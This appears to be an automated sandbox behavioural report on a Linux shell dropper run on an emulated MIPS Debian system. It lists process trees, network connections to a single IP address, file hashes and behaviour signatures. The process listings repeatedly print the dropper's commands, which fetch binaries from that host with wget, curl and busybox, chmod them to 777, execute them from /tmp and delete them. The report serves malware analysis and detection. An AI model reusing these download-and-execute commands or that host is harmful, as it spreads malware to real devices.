/tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad
[./ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/bin/rm
[rm ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/usr/bin/wget
[wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/bin/chmod
[chmod 777 q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff
[./q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/bin/rm
[rm q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/usr/bin/wget
[wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/bin/chmod
[chmod 777 KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp
[./KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/bin/rm
[rm KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/usr/bin/wget
[wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/bin/chmod
[chmod 777 yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV
[./yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/bin/rm
[rm yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/usr/bin/wget
[wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/bin/chmod
[chmod 777 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3
[./3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/bin/rm
[rm 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/usr/bin/wget
[wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/bin/chmod
[chmod 777 aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl
[./aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/bin/rm
[rm aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/usr/bin/wget
[wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
Files
/tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
memory/747-1-0xb6726000-0xb6737044-memory.dmp
memory/786-2-0xb6728000-0xb6739044-memory.dmp
memory/859-3-0xb675a000-0xb676b044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-25 01:17
Reported
2024-10-25 01:20
Platform
debian9-mipsbe-20240611-en
Max time kernel
84s
Max time network
86s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC | /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC | N/A |
| N/A | /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe | /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe | N/A |
| N/A | /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB | /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB | N/A |
| N/A | /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 | /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 | N/A |
| N/A | /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl | /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl | N/A |
| N/A | /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV | /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV | N/A |
| N/A | /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr | /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr | N/A |
| N/A | /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr | /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr | N/A |
| N/A | /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC | /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC | N/A |
| N/A | /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm | /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm | N/A |
| N/A | /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff | /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff | N/A |
| N/A | /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp | /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp | N/A |
| N/A | /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV | /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV | N/A |
| N/A | /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad | /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad | N/A |
| N/A | /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad | /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad | N/A |
| N/A | /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff | /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff | N/A |
| N/A | /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp | /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp | N/A |
| N/A | /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV | /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV | N/A |
| N/A | /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 | /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 | N/A |
| N/A | /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl | /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl | N/A |
| N/A | /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV | /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV | N/A |
| N/A | /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC | /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC | N/A |
| N/A | /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe | /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe | N/A |
| N/A | /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB | /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB | N/A |
| N/A | /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr | /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr | N/A |
| N/A | /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm | /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm | N/A |
| N/A | /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr | /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr | N/A |
| N/A | /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC | /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr | /usr/bin/curl | N/A |
| File opened for modification | /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff | /usr/bin/curl | N/A |
| File opened for modification | /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV | /usr/bin/curl | N/A |
Processes
/tmp/2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh
[/tmp/2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/bin/chmod
[chmod 777 fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC
[./fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/bin/rm
[rm fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/usr/bin/wget
[wget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/bin/chmod
[chmod 777 l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe
[./l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/bin/rm
[rm l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/usr/bin/wget
[wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/bin/chmod
[chmod 777 vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB
[./vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/bin/rm
[rm vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/usr/bin/wget
[wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/bin/chmod
[chmod 777 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3
[./3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/bin/rm
[rm 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/usr/bin/wget
[wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/bin/chmod
[chmod 777 aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl
[./aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/bin/rm
[rm aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/usr/bin/wget
[wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/bin/chmod
[chmod 777 c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV
[./c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/bin/rm
[rm c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/usr/bin/wget
[wget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/bin/chmod
[chmod 777 mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr
[./mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/bin/rm
[rm mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/usr/bin/wget
[wget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/bin/chmod
[chmod 777 Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr
[./Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/bin/rm
[rm Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/usr/bin/wget
[wget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/bin/chmod
[chmod 777 PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC
[./PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/bin/rm
[rm PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/usr/bin/wget
[wget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/bin/chmod
[chmod 777 EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm
[./EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/bin/rm
[rm EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/usr/bin/wget
[wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/bin/chmod
[chmod 777 q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff
[./q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/bin/rm
[rm q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/usr/bin/wget
[wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/bin/chmod
[chmod 777 KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp
[./KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/bin/rm
